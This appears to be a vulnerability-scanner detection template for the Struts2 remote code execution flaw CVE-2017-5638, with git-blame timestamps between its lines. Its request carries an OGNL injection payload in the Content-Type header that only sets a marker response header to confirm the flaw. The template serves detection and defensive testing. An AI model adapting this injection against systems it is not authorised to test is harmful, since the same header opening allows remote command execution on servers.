2020-09-15 19:25:55 +00:00
id : cve-2017-5638
2020-08-19 13:13:31 +00:00
info :
author : "Random Robbie"
name : "Struts2 RCE "
severity : critical
2020-08-27 16:19:24 +00:00
description : Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’
2020-08-19 13:13:31 +00:00
# This template supports the detection part only.
# Do not test any website without permission
2020-08-19 13:55:42 +00:00
# Exploit:- https://github.com/mazen160/struts-pwn
2020-08-19 13:13:31 +00:00
requests :
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
Accept-Charset : iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language : en
Content-Type : %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection : Keep-Alive
User-Agent : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma : no -cache
Accept : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers :
- type : word
words :
2020-08-30 04:14:52 +00:00
- "X-Hacker: Bounty Plz"
part : header
